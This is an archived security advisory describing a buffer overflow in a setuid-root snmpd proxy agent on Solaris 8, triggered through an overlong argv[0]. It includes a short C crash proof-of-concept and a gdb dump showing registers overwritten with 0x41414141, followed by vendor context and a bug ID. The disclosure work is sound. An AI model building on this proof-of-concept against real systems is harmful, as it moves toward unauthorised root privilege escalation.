Vulnerability
snmpd
Affected
Solaris 8
Description
Pablo Sor found following. The /opt/SUNWssp/snmpd command (SNMP
proxy agent) is suid root and contains a buffer overflow, the
problem occurs when it copy his own name (argv[0]) to an internal
variable without checking out its lenght and this causes the
overflow.
#include <stdio.h>
void main(int argc,char **argv)
{
char *buf;
buf = (char *) malloc(atoi(argv[1])*sizeof(char));
memset(buf,0x41,atoi(argv[1])-1);
buf[atoi(argv[1])-1]=0;
execl("/opt/SUNWssp/bin/snmpd",buf,(char *)0);
}
-----------------------------------------------------
$ uname -a
SunOS tomy 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10
$ ./snmpd-demo 700
Segmentation Fault (core dumped)
$ gdb ./snmpd-demo --core=core
[..]
Program received signal SIGSEGV, Segmentation fault.
0xfee32b58 in strcpy () from /usr/lib/libc.so.1
(gdb) info registers
g0 0x0 0
g1 0x78000 491520
g2 0xff22579c -14526564
g3 0xff162d78 -15323784
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x76f98 487320
o0 0x2c1 705
o1 0xffbed9b9 -4269639
o2 0x2c1 705
o3 0x41 65
o4 0xffbed180 -4271744
o5 0xff26a147 -14245561
sp 0xffbed658 -4270504
o7 0xfee83650 -18336176
l0 0x7efefeff 2130640639
l1 0x81010100 -2130640640
l2 0xff000000 -16777216
l3 0xff0000 16711680
l4 0xff00 65280
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x41414141 1094795585 ;;;;;
i1 0xffbed6fc -4270340 ; pointer to argv[0]
i2 0x41414141 1094795585 ;;;;;
i3 0x41414141 1094795585 ;;;;;
i4 0x81010100 -2130640640
i5 0xff00 65280
fp 0xffbed698 -4270440
i7 0xff265474 -14265228
y 0x6 6
psr 0xfe001000 -33550336
wim 0x0 0
tbr 0x0 0
pc 0xfee32b58 -18666664
npc 0xfee32b5c -18666660
fpsr 0x0 0
cpsr 0x0 0
(gdb) x/20x $i1
0xffbed6fc: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbed70c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbed71c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbed72c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbed73c: 0x41414141 0x41414141 0x41414141 0x41414141
Solution
Just for clarification this binary is NOT part of Solaris 8 it is
part of the SUNWsspop package which will only be installed on the
SSP (System Service Processor) machine of a Enterprise 10,000
(aka Starfire) machine.
This package is not part of a standard install, it would only be
loaded on the SSP of an E10K which if recommended practice is
followed would be on a controlled admin network, and would only
allow access to the users ssp, root and perhaps application ID's
like patrol. The reason it is setuid is that it is normally
started by the user ssp and needs to access privileged ports.
Sun logged a bug (Id: 4425460) so the problem will be fixed in
future releases.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
